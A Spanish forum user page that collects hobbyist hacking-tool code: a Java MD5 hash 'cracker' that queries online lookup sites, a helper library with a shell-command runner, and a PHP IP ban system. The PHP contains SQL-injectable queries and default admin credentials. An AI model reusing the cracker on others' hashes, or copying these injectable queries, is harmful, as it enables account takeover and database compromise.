Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
// MD5 Cracker 0.2
// (C) Doddy Hackman 2015
// Credits : Based in the services ...
// http://md5online.net/index.php
// http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php
// http://md5decryption.com/index.php
package MD5_Cracker;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.swing.JOptionPane;
import javax.swing.SwingUtilities;
import org.jvnet.substance.SubstanceLookAndFeel;
/**
*
* @author Doddy
*/
public class Home extends javax.swing.JFrame {
/**
* Creates new form Home
*/
public Home() {
initComponents();
}
/**
* This method is called from within the constructor to initialize the form.
* WARNING: Do NOT modify this code. The content of this method is always
* regenerated by the Form Editor.
*/
@SuppressWarnings("unchecked")
// <editor-fold defaultstate="collapsed" desc="Generated Code">
private void initComponents() {
jPanel3 = new javax.swing.JPanel();
jPanel1 = new javax.swing.JPanel();
txtMD5 = new javax.swing.JTextField();
btnCrack = new javax.swing.JButton();
jPanel2 = new javax.swing.JPanel();
jLabel1 = new javax.swing.JLabel();
jLabel2 = new javax.swing.JLabel();
jLabel3 = new javax.swing.JLabel();
txtPassword1 = new javax.swing.JTextField();
txtPassword2 = new javax.swing.JTextField();
txtPassword3 = new javax.swing.JTextField();
jPanel4 = new javax.swing.JPanel();
status = new javax.swing.JLabel();
javax.swing.GroupLayout jPanel3Layout = new javax.swing.GroupLayout(jPanel3);
jPanel3.setLayout(jPanel3Layout);
jPanel3Layout.setHorizontalGroup(
jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGap(0, 100, Short.MAX_VALUE)
);
jPanel3Layout.setVerticalGroup(
jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGap(0, 100, Short.MAX_VALUE)
);
setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);
setTitle("MD5 Cracker 0.2 (C) Doddy Hackman 2015");
setResizable(false);
jPanel1.setBorder(javax.swing.BorderFactory.createTitledBorder(null, "Enter MD5", javax.swing.border.TitledBorder.DEFAULT_JUSTIFICATION, javax.swing.border.TitledBorder.TOP));
btnCrack.setText("Crack");
btnCrack.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
btnCrackActionPerformed(evt);
}
});
javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
jPanel1.setLayout(jPanel1Layout);
jPanel1Layout.setHorizontalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addComponent(txtMD5, javax.swing.GroupLayout.PREFERRED_SIZE, 280, javax.swing.GroupLayout.PREFERRED_SIZE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(btnCrack, javax.swing.GroupLayout.DEFAULT_SIZE, 75, Short.MAX_VALUE)
.addContainerGap())
);
jPanel1Layout.setVerticalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel1Layout.createSequentialGroup()
.addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
.addComponent(txtMD5, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
.addComponent(btnCrack))
.addContainerGap())
);
jPanel2.setBorder(javax.swing.BorderFactory.createTitledBorder(null, "Result", javax.swing.border.TitledBorder.DEFAULT_JUSTIFICATION, javax.swing.border.TitledBorder.TOP));
jLabel1.setText("md5online.net ->");
jLabel2.setText("md5.my-addr.co ->");
jLabel3.setText("md5decryption.com ->");
txtPassword1.setEditable(false);
txtPassword2.setEditable(false);
txtPassword3.setEditable(false);
javax.swing.GroupLayout jPanel2Layout = new javax.swing.GroupLayout(jPanel2);
jPanel2.setLayout(jPanel2Layout);
jPanel2Layout.setHorizontalGroup(
jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel2Layout.createSequentialGroup()
.addGap(28, 28, 28)
.addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
.addGroup(jPanel2Layout.createSequentialGroup()
.addComponent(jLabel3)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
.addComponent(txtPassword3))
.addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel2Layout.createSequentialGroup()
.addComponent(jLabel2)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
.addComponent(txtPassword2))
.addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel2Layout.createSequentialGroup()
.addComponent(jLabel1)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
.addComponent(txtPassword1, javax.swing.GroupLayout.PREFERRED_SIZE, 229, javax.swing.GroupLayout.PREFERRED_SIZE)))
.addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
);
jPanel2Layout.setVerticalGroup(
jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel2Layout.createSequentialGroup()
.addContainerGap()
.addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
.addComponent(jLabel1)
.addComponent(txtPassword1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
.addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
.addComponent(jLabel2)
.addComponent(txtPassword2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
.addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
.addComponent(jLabel3)
.addComponent(txtPassword3, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
.addContainerGap(15, Short.MAX_VALUE))
);
jPanel4.setBorder(javax.swing.BorderFactory.createBevelBorder(javax.swing.border.BevelBorder.RAISED));
status.setText("[+] Program Ready");
javax.swing.GroupLayout jPanel4Layout = new javax.swing.GroupLayout(jPanel4);
jPanel4.setLayout(jPanel4Layout);
jPanel4Layout.setHorizontalGroup(
jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel4Layout.createSequentialGroup()
.addComponent(status)
.addGap(0, 0, Short.MAX_VALUE))
);
jPanel4Layout.setVerticalGroup(
jPanel4Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel4Layout.createSequentialGroup()
.addGap(0, 0, Short.MAX_VALUE)
.addComponent(status))
);
javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
getContentPane().setLayout(layout);
layout.setHorizontalGroup(
layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(layout.createSequentialGroup()
.addContainerGap()
.addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(jPanel2, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
.addContainerGap())
.addComponent(jPanel4, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
);
layout.setVerticalGroup(
layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(layout.createSequentialGroup()
.addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
.addComponent(jPanel1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jPanel4, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
.addGap(0, 0, 0))
);
pack();
}// </editor-fold>
private void btnCrackActionPerformed(java.awt.event.ActionEvent evt) {
DH_Tools tools = new DH_Tools();
if ("".equals(txtMD5.getText())) {
JOptionPane.showMessageDialog(null, "Write MD5");
} else {
SwingUtilities.updateComponentTreeUI(this);
status.setText("[+] Cracking ...");
String md5 = txtMD5.getText();
String code1 = tools.tomar("http://md5online.net/index.php", "pass=" + md5 + "&option=hash2text&send=Submit");
Pattern search = null;
Matcher regex = null;
search = Pattern.compile("pass : <b>(.*?)<\\/b>");
regex = search.matcher(code1);
if (regex.find()) {
txtPassword1.setText(regex.group(1));
} else {
txtPassword1.setText("Not Found");
}
String code2 = tools.tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php", "md5=" + md5);
search = Pattern.compile("<span class='middle_title'>Hashed string<\\/span>: (.*?)<\\/div>");
regex = search.matcher(code2);
if (regex.find()) {
txtPassword2.setText(regex.group(1));
} else {
txtPassword2.setText("Not Found");
}
String code3 = tools.tomar("http://md5decryption.com/index.php", "hash=" + md5 + "&submit=Decrypt It!");
search = Pattern.compile("Decrypted Text: <\\/b>(.*?)<\\/font>");
regex = search.matcher(code3);
if (regex.find()) {
txtPassword3.setText(regex.group(1));
} else {
txtPassword3.setText("Not Found");
}
SwingUtilities.updateComponentTreeUI(this);
status.setText("[+] Finished");
}
}
/**
* @param args the command line arguments
*/
public static void main(String args[]) {
/* Set the Nimbus look and feel */
//<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) ">
/* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.
* For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html
*/
try {
for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {
if ("Nimbus".equals(info.getName())) {
javax.swing.UIManager.setLookAndFeel(info.getClassName());
break;
}
}
} catch (ClassNotFoundException ex) {
java.util.logging.Logger.getLogger(Home.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
} catch (InstantiationException ex) {
java.util.logging.Logger.getLogger(Home.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
} catch (IllegalAccessException ex) {
java.util.logging.Logger.getLogger(Home.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
} catch (javax.swing.UnsupportedLookAndFeelException ex) {
java.util.logging.Logger.getLogger(Home.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
}
//</editor-fold>
/* Create and display the form */
Home.setDefaultLookAndFeelDecorated(true);
String skin = "org.jvnet.substance.skin.RavenGraphiteGlassSkin";
SubstanceLookAndFeel.setSkin(skin);
SubstanceLookAndFeel.setCurrentWatermark("org.jvnet.substance.watermark.SubstanceMetalWallWatermark");
java.awt.EventQueue.invokeLater(new Runnable() {
public void run() {
new Home().setVisible(true);
}
});
}
// Variables declaration - do not modify
private javax.swing.JButton btnCrack;
private javax.swing.JLabel jLabel1;
private javax.swing.JLabel jLabel2;
private javax.swing.JLabel jLabel3;
private javax.swing.JPanel jPanel1;
private javax.swing.JPanel jPanel2;
private javax.swing.JPanel jPanel3;
private javax.swing.JPanel jPanel4;
private javax.swing.JLabel status;
private javax.swing.JTextField txtMD5;
private javax.swing.JTextField txtPassword1;
private javax.swing.JTextField txtPassword2;
private javax.swing.JTextField txtPassword3;
// End of variables declaration
}
// The End ?
// Class : DH Tools
// Version : 0.2
// (C) Doddy Hackman 2015
// Functions :
//
//public String toma(String link)
//public String tomar(String pagina, String data)
//public void savefile(String ruta, String texto)
//public String read_file(String ruta)
//public String console(String command)
//public String httpfinger(String target)
//public Integer response_code(String page)
//public ArrayList repes(ArrayList array)
//public ArrayList cortar(ArrayList array)
//public String regex(String code, String deaca, String hastaaca)
//public Boolean download(String url, File savefile)
//public String extract_file_by_url(String url)
//public String uri_split(String link, String opcion)
//public String md5_encode(String text)
//public String md5_file(String file)
//public String get_ip(String hostname)
//
package dhtools;
import java.io.*;
import java.net.*;
import java.nio.channels.Channels;
import java.nio.channels.ReadableByteChannel;
import java.util.ArrayList;
import java.util.Scanner;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.security.*;
public class DH_Tools {
public String toma(String link) {
String re;
StringBuffer conte = new StringBuffer(40);
try {
URL url = new URL(link);
URLConnection nave = url.openConnection();
nave.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
BufferedReader leyendo = new BufferedReader(
new InputStreamReader(nave.getInputStream()));
while ((re = leyendo.readLine()) != null) {
conte.append(re);
}
leyendo.close();
} catch (Exception e) {
//
}
return conte.toString();
}
public String tomar(String pagina, String data) {
// Credits : Function based in http://www.mkyong.com/java/how-to-send-http-request-getpost-in-java/
String respuesta = "";
try {
URL url_now = new URL(pagina);
HttpURLConnection nave = (HttpURLConnection) url_now.openConnection();
nave.setRequestMethod("POST");
nave.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
nave.setDoOutput(true);
DataOutputStream send = new DataOutputStream(nave.getOutputStream());
send.writeBytes(data);
send.flush();
send.close();
BufferedReader leyendo = new BufferedReader(new InputStreamReader(nave.getInputStream()));
StringBuffer code = new StringBuffer();
String linea;
while ((linea = leyendo.readLine()) != null) {
code.append(linea);
}
leyendo.close();
respuesta = code.toString();
} catch (Exception e) {
//
}
return respuesta;
}
public void savefile(String ruta, String texto) {
FileWriter escribir = null;
File archivo = null;
try {
archivo = new File(ruta);
if (!archivo.exists()) {
archivo.createNewFile();
}
escribir = new FileWriter(archivo, true);
escribir.write(texto);
escribir.flush();
escribir.close();
} catch (Exception e) {
//
}
}
public String read_file(String ruta) {
String contenido = null;
try {
Scanner leyendo = new Scanner(new FileReader(ruta));
contenido = leyendo.next();
} catch (Exception e) {
//
}
return contenido;
}
public String console(String command) {
String contenido = null;
try {
Process proceso = Runtime.getRuntime().exec("cmd /c " + command);
proceso.waitFor();
BufferedReader leyendo = new BufferedReader(
new InputStreamReader(proceso.getInputStream()));
String linea;
StringBuffer code = new StringBuffer();
while ((linea = leyendo.readLine()) != null) {
code.append(linea);
}
contenido = code.toString();
} catch (Exception e) {
//
}
return contenido;
}
public String httpfinger(String target) {
String resultado = "";
//http://www.mkyong.com/java/how-to-get-http-response-header-in-java/
try {
URL page = new URL(target);
URLConnection nave = page.openConnection();
String server = nave.getHeaderField("Server");
String etag = nave.getHeaderField("ETag");
String content_length = nave.getHeaderField("Content-Length");
String expires = nave.getHeaderField("Expires");
String last_modified = nave.getHeaderField("Last-Modified");
String connection = nave.getHeaderField("Connection");
String powered = nave.getHeaderField("X-Powered-By");
String pragma = nave.getHeaderField("Pragma");
String cache_control = nave.getHeaderField("Cache-Control");
String date = nave.getHeaderField("Date");
String vary = nave.getHeaderField("Vary");
String content_type = nave.getHeaderField("Content-Type");
String accept_ranges = nave.getHeaderField("Accept-Ranges");
if (server != null) {
resultado += "[+] Server : " + server + "\n";
}
if (etag != null) {
resultado += "[+] E-tag : " + etag + "\n";
}
if (content_length != null) {
resultado += "[+] Content-Length : " + content_length + "\n";
}
if (expires != null) {
resultado += "[+] Expires : " + expires + "\n";
}
if (last_modified != null) {
resultado += "[+] Last Modified : " + last_modified + "\n";
}
if (connection != null) {
resultado += "[+] Connection : " + connection + "\n";
}
if (powered != null) {
resultado += "[+] Powered : " + powered + "\n";
}
if (pragma != null) {
resultado += "[+] Pragma : " + pragma + "\n";
}
if (cache_control != null) {
resultado += "[+] Cache control : " + cache_control + "\n";
}
if (date != null) {
resultado += "[+] Date : " + date + "\n";
}
if (vary != null) {
resultado += "[+] Vary : " + vary + "\n";
}
if (content_type != null) {
resultado += "[+] Content-Type : " + content_type + "\n";
}
if (accept_ranges != null) {
resultado += "[+] Accept Ranges : " + accept_ranges + "\n";
}
} catch (Exception e) {
//
}
return resultado;
}
public Integer response_code(String page) {
Integer response = 0;
try {
URL url = new URL(page);
URLConnection nave1 = url.openConnection();
HttpURLConnection nave2 = (HttpURLConnection) nave1;
nave2.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
response = nave2.getResponseCode();
} catch (Exception e) {
response = 404;
}
return response;
}
public ArrayList repes(ArrayList array) {
Object[] listando = array.toArray();
for (Object item : listando) {
if (array.indexOf(item) != array.lastIndexOf(item)) {
array.remove(array.lastIndexOf(item));
}
}
return array;
}
public ArrayList cortar(ArrayList array) {
ArrayList array2 = new ArrayList();
for (int i = 0; i < array.size(); i++) {
String code = (String) array.get(i);
Pattern regex1 = null;
Matcher regex2 = null;
regex1 = Pattern.compile("(.*?)=(.*?)");
regex2 = regex1.matcher(code);
if (regex2.find()) {
array2.add(regex2.group(1) + "=");
}
}
return array2;
}
public String regex(String code, String deaca, String hastaaca) {
String resultado = "";
Pattern regex1 = null;
Matcher regex2 = null;
regex1 = Pattern.compile(deaca + "(.*?)" + hastaaca);
regex2 = regex1.matcher(code);
if (regex2.find()) {
resultado = regex2.group(1);
}
return resultado;
}
public Boolean download(String url, File savefile) {
// Credits : Based on http://stackoverflow.com/questions/921262/how-to-download-and-save-a-file-from-internet-using-java
// Thanks to Brian Risk
try {
URL download_page = new URL(url);
ReadableByteChannel down1 = Channels.newChannel(download_page.openStream());
FileOutputStream down2 = new FileOutputStream(savefile);
down2.getChannel().transferFrom(down1, 0, Long.MAX_VALUE);
down1.close();
down2.close();
return true;
} catch (IOException e) {
return false;
}
}
public String extract_file_by_url(String url) {
return url.substring(url.lastIndexOf('/') + 1);
}
public String uri_split(String link, String opcion) {
String resultado = "";
try {
URL url = new URL(link);
if (opcion == "protocol") {
resultado = url.getProtocol();
} else if (opcion == "authority") {
resultado = url.getAuthority();
} else if (opcion == "host") {
resultado = url.getHost();
} else if (opcion == "port") {
resultado = String.valueOf(url.getPort());
} else if (opcion == "path") {
resultado = url.getPath();
} else if (opcion == "query") {
resultado = url.getQuery();
} else if (opcion == "filename") {
resultado = url.getFile();
} else if (opcion == "ref") {
resultado = url.getRef();
} else {
resultado = "Error";
}
} catch (Exception e) {
//
}
return resultado;
}
public String md5_encode(String text) {
// Credits : Based on http://www.avajava.com/tutorials/lessons/how-do-i-generate-an-md5-digest-for-a-string.html
StringBuffer string_now = null;
try {
MessageDigest generate = MessageDigest.getInstance("MD5");
generate.update(text.getBytes());
byte[] result = generate.digest();
string_now = new StringBuffer();
for (byte line : result) {
string_now.append(String.format("%02x", line & 0xff));
}
} catch (Exception e) {
//
}
return string_now.toString();
}
public String md5_file(String file) {
//Credits : Based on http://stackoverflow.com/questions/304268/getting-a-files-md5-checksum-in-java
// Thanks to
String resultado = "";
try {
MessageDigest convert = MessageDigest.getInstance("MD5");
FileInputStream file_now = new FileInputStream(file);
byte[] bytes_now = new byte[1024];
int now_now = 0;
while ((now_now = file_now.read(bytes_now)) != -1) {
convert.update(bytes_now, 0, now_now);
};
byte[] converting = convert.digest();
StringBuffer result = new StringBuffer();
for (int i = 0; i < converting.length; i++) {
result.append(Integer.toString((converting[i] & 0xff) + 0x100, 16).substring(1));
}
resultado = result.toString();
} catch (Exception e) {
//
}
return resultado;
}
public String get_ip(String hostname) {
String resultado = "";
try {
InetAddress getting_ip = InetAddress.getByName(hostname);
resultado = getting_ip.getHostAddress();
} catch (Exception e) {
//
}
return resultado;
}
}
// The End ?
package dhtools;
import java.util.ArrayList;
import java.util.Collections;
public class Main {
public static void main(String[] args) {
DH_Tools tools = new DH_Tools();
//String codigo = tools.toma("http://localhost/");
//String codigo = tools.tomar("http://localhost/login.php", "usuario=test&password=dsdsads&control=Login");
//tools.savefile("c:/xampp/texto.txt","texto");
//String codigo = tools.read_file("c:/xampp/texto.txt");
//String codigo = tools.console("ver");
//String codigo = tools.httpfinger("http://www.petardas.com");
/*
ArrayList array = new ArrayList();
Collections.addAll(array, "http://localhost/sql.php?id=dsaadsds", "b", "http://localhost/sql.php?id=dsaadsds", "c");
ArrayList array2 = tools.repes(tools.cortar(array));
for (int i = 0; i < array2.size(); i++) {
System.out.println(array2.get(i));
}
*/
//System.out.println(tools.regex("1sadasdsa2","1","2"));
//System.out.println(tools.response_code("http://www.petardas.com/"));
/*
File savefile = new File("c:/xampp/mierda.avi");
if(tools.download("http://localhost/test.avi",savefile)) {
System.out.println("yeah");
}
*/
//System.out.println(tools.extract_file_by_url("http://localhost/dsaads/dsadsads/index.php"));
//System.out.println(tools.uri_split("http://localhost/index.php?id=dadsdsa","query"));
//System.out.println(tools.md5_encode("123"));
//System.out.println(tools.md5_file("c:\\xampp\\texto.txt"));
//System.out.println(tools.get_ip("www.petardas.com"));
}
}
<?php
// Ban System 0.3
// (C) Doddy Hackman 2015
// Login
$username = "admin"; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3"; // Edit
//
$index = "admin.php"; // Edit
if (isset($_GET['poraca'])) {
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Login</title>
<link rel="shortcut icon" href="images/icono.png">
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<center><br>
<div class="post">
<h3>Login</h3>
<div class="post_body">
<img src="images/login.jpg" width="562" height="440" />
<br />
<form action="" method=POST>
Username : <input type=text size=30 name=username /><br
/><br />
Password : <input type=password size=30 name=password
/><br /><br />
<input type=submit name=login style="width: 100px;"
value=Login /><br /><br />
</form>
</div>
</div>
</center>
</body>
</html>';
if (isset($_POST['login'])) {
$test_username = $_POST['username'];
$test_password = md5($_POST['password']);
if ($test_username == $username && $test_password == $password) {
setcookie("login", base64_encode($test_username . "@" . $test_password));
echo "<script>alert('Welcome idiot');</script>";
$ruta = "http://" . $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']) . "/" . $index;
echo '<meta http-equiv="refresh" content="0; url=' . htmlentities($ruta) . '"
/>';
} else {
echo "<script>alert('Fuck You');</script>";
}
}
} else {
echo '<meta http-equiv="refresh" content="0;
url=http://www.petardas.com" />';
}
// The End ?
?>
<?php
// Ban System 0.3
// (C) Doddy Hackman 2015
error_reporting(0);
// Login
$username = "admin"; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3"; // Edit
// DB
$host = "localhost"; // Edit
$userw = "root"; // Edit
$passw = ""; // Edit
$db = "ban"; // Edit
if (isset($_COOKIE['login'])) {
$st = base64_decode($_COOKIE['login']);
$plit = explode("@", $st);
$user = $plit[0];
$pass = $plit[1];
if ($user == $username and $pass == $password) {
mysql_connect($host, $userw, $passw);
mysql_select_db($db);
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Ban System 0.3</title>
<link href="style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="images/icono.png">
</head>
<body>
<center>';
mysql_connect($host, $userw, $passw);
mysql_select_db($db);
echo ' <br><img src="images/ban.png" /><br><br>';
if (isset($_POST['instalar'])) {
$todo = "create table ban_system (
id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
ip TEXT NOT NULL,
PRIMARY KEY(id));
";
if (mysql_query($todo)) {
echo "<script>alert('Installed');</script>";
echo '<meta http-equiv="refresh" content=0;URL=>';
} else {
echo "<script>alert('Error');</script>";
}
}
if (mysql_num_rows(mysql_query("show tables like 'ban_system'"))) {
echo "<title>Ban System 0.3 Administracion</title>";
if (isset($_POST['ipadd'])) {
$ipfinal = ip2long($_POST['ipadd']);
$ipaz = $_POST['ipadd'];
if ($ipfinal == -1 || $ipfinal === FALSE) {
echo "<script>alert('IP invalid');</script>";
} else {
if (mysql_query("INSERT INTO ban_system (id,ip) values (NULL,'$ipaz')")) {
echo "<script>alert('IP added');</script>";
} else {
echo "<script>alert('Error');</script>";
}
}
}
if (isset($_GET['del'])) {
$id = $_GET['del'];
if (@mysql_query("DELETE FROM ban_system where id ='$id'")) {
echo "<script>alert('IP Deleted');</script>";
} else {
echo "<script>alert('Error');</script>";
}
}
echo '
<div class="post">
<h3>Add IP</h3>
<div class="post_body">';
echo "<br>
<form action='' method=POST>
<b>IP : </b><input type=text name=ipadd value=127.0.0.1> <input type=submit style='width: 100px;' value=Add>
</form><br>";
echo ' </div>
</div>';
$sql = "select id from ban_system";
$resultado = mysql_query($sql);
$cantidad = mysql_num_rows($resultado);
echo '
<div class="post">
<h3>Banned : ' . htmlentities($cantidad) . '</h3>
<div class="post_body"><br>';
if ($cantidad <= 0) {
echo '<b>No entries found</b><br>';
} else {
echo '<table>
<td><b>ID</b></td><td><b>IP</b></td><td><b>Option</b></td><tr>';
$sen = @mysql_query("select * from ban_system order by id ASC");
while ($ab = @mysql_fetch_array($sen)) {
echo "<td>" . htmlentities($ab[0]) . "</td><td>" . htmlentities($ab[1]) . "</td><td><a href=?del=" . htmlentities($ab[0]) . ">Delete</a></td><tr>";
}
echo '</table>';
}
echo ' <br></div>
</div>';
echo "</table>
</center>
";
//
} else {
echo '
<div class="post">
<h3>Installer</h3>
<div class="post_body">';
echo "
<form action='' method=POST>
<h2>Do you want install Ban System ?</h2><br>
<input type=submit style='width: 100px;' name=instalar value=Install><br><br>
</form>";
echo ' </div>
</div>';
}
echo '
<br><h3>(C) Doddy Hackman 2015</h3><br>
</center>
</body>
</html>';
mysql_close();
exit(1);
} else {
echo "<script>alert('Fuck You');</script>";
}
} else {
echo '<meta http-equiv="refresh" content="0; url=http://www.petardas.com" />';
}
?>
/*
==-----------------------------------==
|| Name : DH Theme ||
|| Version : 0.8 ||
|| Author : Doddy H ||
|| Description: Templante ||
|| Date : 14/1/2015 ||
==-----------------------------------==
*/
body {
background:transparent url("images/fondo.jpg") repeat scroll 0 0;
color:gray;
font-family:helvetica,arial,sans-serif;
font-size:14px;
text-align:center;
}
a:link {
text-decoration:none;
color:orange;
}
a:visited {
color:orange;
}
a:hover {
color:orange;
}
td,tr {
border-style:solid;
border-color: gray;
border-width: 1px;
background: black;
border: solid #222 2px;
color:gray;
font-family:helvetica,arial,sans-serif;
font-size:14px;
text-align:center;
word-wrap: break-word;
word-break:break-all;
}
input {
border-style:solid;
border-color: gray;
border-width: 1px;
background: black;
border: solid #222 2px;
color:gray;
font-family:helvetica,arial,sans-serif;
font-size:14px;
}
.post {
background-color:black;
color:gray;
margin-bottom:10px;
width:600px;
word-wrap: break-word;
}
.post h3 {
background-color:black;
color:orange;
background-color:#000;
border: solid #222 2px;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
padding:5px 10px;
}
.post_body {
background-color:black;
margin:-20px 0 0 0;
color:white;
background-color:#000;
border: solid #222 2px;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
padding:5px 10px;
}
/* The End ? */
<?php
// Ban System 0.3
// (C) Doddy Hackman 2015
error_reporting(0);
// DB
$host = "localhost"; // Edit
$userw = "root"; // Edit
$passw = ""; // Edit
$db = "ban"; // Edit
//
$texto = "Acceso Denegado"; // Edit
mysql_connect($host, $userw, $passw);
mysql_select_db($db);
$ipa = ip2long($_SERVER['REMOTE_ADDR']);
$ip = $_SERVER['REMOTE_ADDR'];
if ($ip == "::1") {
$ipa = 1;
}
if ($ipa == -1 || $ipa === FALSE) {
echo "<script>alert('Good try');</script>";
} else {
if ($ip == "::1") {
$ip = "127.0.0.1";
}
$re = mysql_query("select ip from ban_system where ip='$ip'");
if (mysql_num_rows($re) > 0) {
echo "<center><h1>" . htmlentities($texto) . "</h1></center>";
exit(1);
}
}
mysql_close();
// The End ?
?>
<?php
include("ban.php");
echo "aca toy";
?>
<?php
// Cookies Manager 0.6
// (C) Doddy Hackman 2015
// Login
$username = "admin"; // Edit
$password = "21232f297a57a5a743894a0e4a801fc3"; // Edit
//
$index = "imagen.php"; // Edit
if (isset($_GET['poraca'])) {
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Login</title>
<link rel="shortcut icon" href="images/icono.png">
